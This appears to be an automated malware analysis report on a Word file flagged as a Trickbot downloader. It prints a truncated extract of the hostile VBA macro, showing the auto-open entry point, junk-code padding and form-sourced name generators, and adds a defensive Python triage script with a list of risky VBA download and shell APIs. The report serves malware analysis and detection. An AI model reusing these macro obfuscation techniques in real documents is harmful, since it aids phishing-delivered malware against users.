Verdict: MALICIOUS
Risk Score: 202

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1059 Command and Scripting Interpreter
- T1566.001 Phishing: Spearphishing Attachment
The sample is flagged as malicious by ClamAV under the signature Win.Downloader.Trickbot-6344490-1, which points to the Trickbot downloader family (a signature name is an attribution hint, not proof on its own). Static analysis of the OLE document recovers a VBA project with an autoopen entry point, so the macro runs as soon as the document is opened with macros enabled, and a Shell() call, which hands control to an arbitrary command line. The combination of automatic execution, a Shell() call and a randomised name generator that reads its character sets from UserForm properties is consistent with a downloader that fetches and runs a second-stage component; no download location appears in the recovered (truncated) macro preview. The single embedded URL, http://schemas.openxmlformats.org/drawingml/2006/main, is the DrawingML XML namespace identifier present in any drawing-bearing Office file and is not a network indicator.
Heuristics (6)
- ClamAV: Win.Downloader.Trickbot-6344490-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Downloader.Trickbot-6344490-1.
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code.
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body).

Note that the OLE_LEGACY_WORDBASIC_AUTOEXEC text ("no modern VBA project was recovered") conflicts with the olevba extraction in the artifacts section, which did recover a VBA project containing autoopen. Treat the WordBasic marker as redundant with OLE_VBA_AUTOOPEN for this sample rather than as a separate execution path.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10426 bytes |

SHA-256 (macros.bas): b0cfb77a9e68a90dc4849797b816df475a9b86c3725f7bcfc633b0f8f3a7777c

Preview: first 1,000 lines of the extracted script. The autoopen handler in ThisDocument is the entry point. The puta* procedures (puta3 to puta10 in the preview) are dead-code padding: their If and Select Case conditions compare unequal literals, so their bodies never execute and exist only to dilute signatures. The generate* functions build random identifiers from character sets stored in properties of UserForm1 and myform1, so those strings never appear in the module source. The Shell() call reported by OLE_VBA_SHELL is not visible in the truncated preview shown here.

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
    myfunc2
End Sub

Attribute VB_Name = "Module1"
Function generateFuncName()
    Randomize
    countSymbols = CInt(Int((9 * Rnd()) + 4))
    symbolRand = CInt(Int(((LFS + 1) * Rnd()) + 1))
    gName = Mid(FS, symbolRand, 1)
    For i = 2 To countSymbols - 1
        symbolRand = CInt(Int(((Len(MS1) + 1) * Rnd()) + 1))
        gName = gName + Mid(MS1, symbolRand, 1)
    Next i
    symbolRand = CInt(Int(((LLS + 1) * Rnd()) + 1))
    gName = gName + Mid(LS, symbolRand, 1)
    generateFuncName = gName
End Function

Attribute VB_Name = "Module2"
Function myfunc2()
    myform1.TextBox1 = "234"
End Function

Attribute VB_Name = "Module3"
Function createTextString(str)
    UserForm2.MyText = str
End Function

Attribute VB_Name = "Module4"
Sub puta10()
    If 776 = 515 Then
        Dim ypost
        ypost = True
        Dim amyp
        amyp = True
        Rem fjhfgktu
    End If
End Sub

Attribute VB_Name = "Module5"
Sub puta8()
    Select Case "obowwa"
        Case "gtappp"
            ' igcik igjo bqafy eca orosz igumina coj
            Rem bmofpibuty yfajaplewc gikcadwasz fom
    End Select
End Sub

Attribute VB_Name = "Module6"
Sub puta7()
    Select Case 307
        Case 445
            Rem urroznohtobq ytfyqowa uwi
            Rem ltot fkufa vycoxcale
            Dim zyfsyc
            zyfsyc = True
            Dim bilmolra
            bilmolra = #6/3/1968#
        Case 513
            Dim ivkazre
            ivkazre = False
    End Select
End Sub

Attribute VB_Name = "Module7"
Sub puta6()
    If 437 = 810 Then
        Dim adoljedw
        adoljedw = "3388"
        Dim inelowj
        inelowj = "2827"
    End If
End Sub

Attribute VB_Name = "Module8"
Sub puta9()
    If 514 = 484 Then
        Dim avniv
        avniv = "8253"
    End If
End Sub

Attribute VB_Name = "Module9"
Sub puta5()
    Select Case 335
        Case 355
            Dim zzuwjybd
            zzuwjybd = True
        Case 238
            Rem haputgiwk qymybij cejexc zojenxu ulgiqdykk zurb emyksemce
            Rem zzeqmy ozybjo voxtisu xxolqygkuxu duqok akti xawvy
        Case 260
            Dim innoff
            innoff = True
            Dim nmiflu
            nmiflu = "cy"
    End Select
End Sub

Attribute VB_Name = "Module10"
Sub puta4()
    Select Case "ebg"
        Case "pe"
            Dim evise
            evise = #9/2/1955#
            Dim nxazed
            nxazed = 3354
            Dim ymcipd
            ymcipd = "3979"
            Rem ibmatl vhahq awehli vlewkytzovw
        Case "fego"
            Dim nkyfe
            nkyfe = "utn"
            Rem ojytceni
        Case "agam"
            Dim evaxsa
            evaxsa = False
            Dim mezuks
            mezuks = #11/18/1967#
            Dim rsesziz
            rsesziz = #5/18/1977#
    End Select
End Sub

Attribute VB_Name = "Module11"
Sub puta3()
    Select Case "ikg"
        Case "mmuxweb"
            ' ajrewolbyvv egelma oxwa uloccutpu jajo uwpyrryten
            Dim ivgekm
            ivgekm = #10/23/1973#
            Rem mseruzvi ozmagi ekykpobh ybxuj apfyqnyzgu cokuju onjacqull
    End Select
End Sub

Attribute VB_Name = "Module12"
Function LS()
    LS = UserForm1.lastSymbol
End Function
Function LLS()
    LLS = Len(LS)
End Function
Function FS()
    FS = myform1.firstSymbol
End Function
Function LFS()
    LFS = Len(FS)
End Function
Function MS1()
    MS1 = UserForm1.middleSymbol1
End Function
Function MS2()
    MS2 = UserForm1.middleSymbol2
End Function

Attribute VB_Name = "Module13"
Function generateFileName1()
    Randomize
    countSymbols = CInt(Int((9 * Rnd()) + 4))
    symbolRand = CInt(Int(((LFS + 1) * Rnd()) + 1))
    gn = Mid(FS, symbolRand, 1)
    For i = 2 To countSymbols - 1
        symbolRand = CInt(Int(((Len(MS2) + 1) * Rnd()) + 1))
        gn = gn + Mid(MS2, symbolRand, 1)
    Next i
    symbolRand = CInt(Int(((LLS + 1) * Rnd()) + 1))
    gn = gn + Mid(LS, symbolRand, 1)
    generateFileName1 = gn
End Function

Attribute VB_Name = "Module14"
Function generateArgName()
    Randomize
    countSymbols = CInt(Int((9 * Rnd()) + 4))
    symbolRand = CInt(Int(((LFS + 1) * Rnd()) + 1))
    gName = Mid(FS, symbolRand, 1)
    For i = 2 To countSymbols - 1
        symbolRand = CInt(Int(((Len(MS1) + 1) * Rnd()) + 1))
        gName = gName + Mid(MS1, symbolRand, 1)
    Next i
    symbolRand = CInt(Int(((LLS + 1) * Rnd()) + 1))
    gName = gName + Mid(LS, symbolRand, 1)
    generateArgName = gName
End Function

Attribute VB_Name = "myform1"
Attribu ... (truncated)
```
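The heuristics above (auto-exec entry point, Shell() call, dead-code padding, form-sourced strings) can be reproduced on the decoded macro source with a few regular expressions. The following is an added triage script, not part of this report or of oletools; it takes olevba-style concatenated VBA text as input and returns structured findings. The SAMPLE_VBA string is a constructed excerpt modelled on the preview above, plus one constructed module (ModuleX) containing a placeholder Shell() call, since the preview on this page is truncated before the Shell() call that OLE_VBA_SHELL reports. The scoring weights are illustrative assumptions, not the analyzer's.

```python
import re

# Constructed excerpt: modules mirror the macros.bas preview; ModuleX and its
# Shell line are a stand-in and were NOT recovered from the sample.
SAMPLE_VBA = r'''Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Sub autoopen()
myfunc2
End Sub
Attribute VB_Name = "Module2"
Function myfunc2()
myform1.TextBox1 = "234"
End Function
Attribute VB_Name = "Module4"
Sub puta10()
If 776 = 515 Then
Dim ypost
ypost = True
Rem fjhfgktu
End If
End Sub
Attribute VB_Name = "Module6"
Sub puta7()
Select Case 307
Case 445
Dim zyfsyc
zyfsyc = True
Case 513
Dim ivkazre
ivkazre = False
End Select
End Sub
Attribute VB_Name = "Module12"
Function LS()
LS = UserForm1.lastSymbol
End Function
Function FS()
FS = myform1.firstSymbol
End Function
Attribute VB_Name = "ModuleX"
' constructed stand-in module, not from the sample
Sub runIt()
Shell "placeholder.exe", vbHide
End Sub
'''

# Procedure names Word/Excel run automatically (lower-cased for comparison).
AUTOEXEC = ("autoopen", "autoexec", "autonew", "autoclose", "auto_open", "auto_close",
            "document_open", "document_close", "workbook_open", "workbook_close")
# Keywords that hand control to the OS, fetch data, or build objects dynamically.
SUSPICIOUS = ("Shell", "CreateObject", "WScript.Shell", "ShellExecute",
              "URLDownloadToFile", "XMLHTTP", "ADODB.Stream", "Environ", "CallByName")

MODULE_RE = re.compile(r'^Attribute VB_Name = "([^"]+)"\s*$', re.M)
PROC_BLOCK_RE = re.compile(
    r'^\s*(?:Public |Private )?(?:Sub|Function)\s+(\w+)\s*\(.*?^\s*End (?:Sub|Function)\b',
    re.M | re.I | re.S)
IF_CONST_RE = re.compile(r'^\s*If\s+(\d+)\s*=\s*(\d+)\s+Then', re.M | re.I)
SELECT_RE = re.compile(r'^\s*Select Case\s+("[^"]*"|\d+)\s*$(.*?)^\s*End Select',
                       re.M | re.I | re.S)
CASE_RE = re.compile(r'^\s*Case\s+("[^"]*"|\d+)\s*$', re.M | re.I)
# A value read from a form control/property, e.g. LS = UserForm1.lastSymbol
FORM_READ_RE = re.compile(r'=\s*(\w*form\w*)\.(\w+)\s*$', re.M | re.I)


def split_modules(src):
    """Map module name -> body, splitting on olevba's 'Attribute VB_Name' headers."""
    parts = MODULE_RE.split(src)           # [preamble, name1, body1, name2, body2, ...]
    return {parts[i]: parts[i + 1] for i in range(1, len(parts) - 1, 2)}


def iter_procs(src):
    """Yield (procedure name, full text) for every Sub/Function in the source."""
    for m in PROC_BLOCK_RE.finditer(src):
        yield m.group(1), m.group(0)


def find_autoexec(src):
    """Procedures whose name alone makes Office run them on open/close."""
    names = {name.lower() for name, _ in iter_procs(src)}
    return sorted(n for n in names if n in AUTOEXEC)


def find_suspicious_calls(src):
    """(keyword, line number, line) for each code line touching a risky API.
    Comments are dropped first; a quote inside a string literal would also cut the
    line, which is acceptable for triage but not for a full parser."""
    hits = []
    for lineno, line in enumerate(src.splitlines(), 1):
        code = line.split("'")[0]
        if re.match(r'\s*Rem\b', code, re.I):
            continue
        for kw in SUSPICIOUS:
            if re.search(r'\b' + re.escape(kw) + r'\b', code, re.I):
                hits.append((kw, lineno, line.strip()))
    return hits


def dead_code_procs(src):
    """Procedures guarded by constant comparisons that can never hold (junk padding)."""
    findings = []
    for proc, body in iter_procs(src):
        reasons = [f"If {a} = {b} never true" for a, b in IF_CONST_RE.findall(body) if a != b]
        for sel, block in SELECT_RE.findall(body):
            cases = CASE_RE.findall(block)
            if cases and sel not in cases:
                reasons.append(f"Select Case {sel} matches none of {cases}")
        if reasons:
            findings.append((proc, reasons))
    return findings


def form_sourced_reads(src):
    """Form properties the macro reads at runtime instead of embedding literals."""
    return sorted({f"{form}.{prop}" for form, prop in FORM_READ_RE.findall(src)})


def triage(src):
    """Run every check and attach an illustrative score (weights are an assumption)."""
    report = {
        "modules": list(split_modules(src)),
        "autoexec": find_autoexec(src),
        "suspicious": find_suspicious_calls(src),
        "dead_code": dead_code_procs(src),
        "form_reads": form_sourced_reads(src),
    }
    score = 30 if report["autoexec"] else 0
    score += 20 * len({kw for kw, _, _ in report["suspicious"]})
    score += 5 * len(report["dead_code"])
    score += 10 if report["form_reads"] else 0
    report["score"] = score
    return report


if __name__ == "__main__":
    for key, value in triage(SAMPLE_VBA).items():
        print(f"{key}: {value}")
```

On the constructed excerpt the script reports autoopen as the entry point, one Shell() hit from the stand-in module, puta10 and puta7 as dead code, and two UserForm reads. Running it on the real macros.bas (10,426 bytes) would locate the Shell() line the preview cuts off and list every form property the name generators depend on, which tells the analyst which UserForm objects to dump next.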